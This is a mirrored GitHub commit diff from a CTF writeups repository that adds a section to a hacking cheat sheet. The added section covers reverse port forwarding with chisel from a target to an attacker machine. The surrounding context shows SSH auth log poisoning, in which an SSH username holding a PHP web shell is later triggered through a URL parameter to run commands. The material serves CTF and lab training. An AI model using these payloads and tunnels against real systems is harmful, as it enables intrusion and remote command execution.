mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-21 19:43:03 +00:00
Update Cheat Sheet.md
This commit is contained in:
ARZ
GitHub
parent
af3be40d54
commit
21c5e7ee71
1 changed files with 7 additions and 0 deletions
|
|
@ -160,6 +160,13 @@ $ kill %1
|
|||
|
||||
Login as any user to see that it gets logged then try to login with a malicious php code
|
||||
|
||||
### Port Forwarding using chisel
|
||||
|
||||
On attacker machine `/chisel_1.7.6_linux_amd64 server -p <port to listen> --reverse`
|
||||
On target machine `./chisel client <attacker>:<attacker_listening_port> R:localhost:<port to forward from target>`
|
||||
|
||||
### Poisining ssh auth log
|
||||
|
||||
`ssh '<?php system($_GET['a']); ?>'@192.168.43.2`
|
||||
|
||||
Then `http://ip/page?a=whoami;`
|
||||
|
|
|
|||
Loading…
Reference in a new issue